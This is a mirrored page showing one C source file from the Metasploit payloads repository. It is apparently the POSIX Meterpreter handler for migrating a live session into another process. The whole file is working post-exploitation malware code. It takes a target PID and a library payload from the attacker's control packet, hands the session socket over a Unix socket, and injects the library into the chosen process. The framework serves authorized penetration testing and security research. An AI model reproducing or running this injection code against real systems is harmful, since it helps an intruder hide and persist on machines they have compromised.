mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-04-30 13:07:22 +02:00
88 lines
2.6 KiB
C
88 lines
2.6 KiB
C
#include "common.h"
|
|
#include "base_inject.h"
|
|
#include "passfd_server.h"
|
|
|
|
LONG passfd_thread(THREAD *thread) {
|
|
SOCKET *orig_fd = (SOCKET *)(thread->parameter1);
|
|
LPSTR sock_path = (LPSTR)(thread->parameter2);
|
|
|
|
if (orig_fd == NULL || sock_path == NULL)
|
|
return ERROR_INVALID_PARAMETER;
|
|
|
|
return passfd(*orig_fd, sock_path);
|
|
}
|
|
|
|
DWORD
|
|
remote_request_core_migrate(Remote *remote, Packet *packet)
|
|
{
|
|
char *sock_path;
|
|
Packet * response = NULL;
|
|
pid_t pid = 0;
|
|
library l;
|
|
DWORD result = 0;
|
|
SOCKET orig_fd = 0;
|
|
|
|
dprintf("[MIGRATE] Getting packet data");
|
|
|
|
response = packet_create_response(packet);
|
|
|
|
// Get the process identifier to inject into
|
|
pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
|
|
// Get the target process architecture to inject into
|
|
l.arch = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ARCH);
|
|
// Get the length of the library buffer
|
|
l.length = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN);
|
|
// Receive the actual migration library buffer
|
|
l.data = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD);
|
|
// Get the library entry point
|
|
l.entry_point = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ENTRY_POINT);
|
|
// Get the library base address
|
|
l.base_addr = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_BASE_ADDR);
|
|
// Get the path for the local socket
|
|
sock_path = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_SOCKET_PATH);
|
|
|
|
dprintf("[MIGRATE] Migrating to %d, Arch: %d, Library Length: 0x%x, Library Base Address: 0x%x, Library Entry Point: 0x%x, Socket path : %s",
|
|
pid,
|
|
l.arch,
|
|
l.length,
|
|
l.base_addr,
|
|
l.entry_point,
|
|
sock_path);
|
|
|
|
orig_fd = remote_get_fd(remote);
|
|
|
|
dprintf("[MIGRATE] Creating passfd thread to share socket %d", orig_fd);
|
|
|
|
THREAD *socket_thread = thread_create((THREADFUNK)passfd_thread, &orig_fd, sock_path, NULL);
|
|
|
|
if (!socket_thread) {
|
|
dprintf("[MIGRATE] Failed to create the passfd thread");
|
|
packet_transmit_response(ERROR_INVALID_HANDLE, remote, response);
|
|
return ERROR_INVALID_HANDLE;
|
|
}
|
|
|
|
if (!thread_run(socket_thread)) {
|
|
thread_destroy(socket_thread);
|
|
dprintf("[MIGRATE] Failed to run the passfd thread");
|
|
packet_transmit_response(EINVAL, remote, response);
|
|
return EINVAL;
|
|
}
|
|
|
|
dprintf("[MIGRATE] Injecting library");
|
|
result = inject_library(pid, &l);
|
|
if (result != 0) {
|
|
thread_join(socket_thread);
|
|
thread_destroy(socket_thread);
|
|
packet_transmit_response(result, remote, response);
|
|
return result;
|
|
}
|
|
|
|
thread_join(socket_thread);
|
|
thread_destroy(socket_thread);
|
|
|
|
dprintf("[MIGRATE] return success");
|
|
packet_transmit_response(ERROR_SUCCESS, remote, response);
|
|
return FALSE;
|
|
}
|
|
|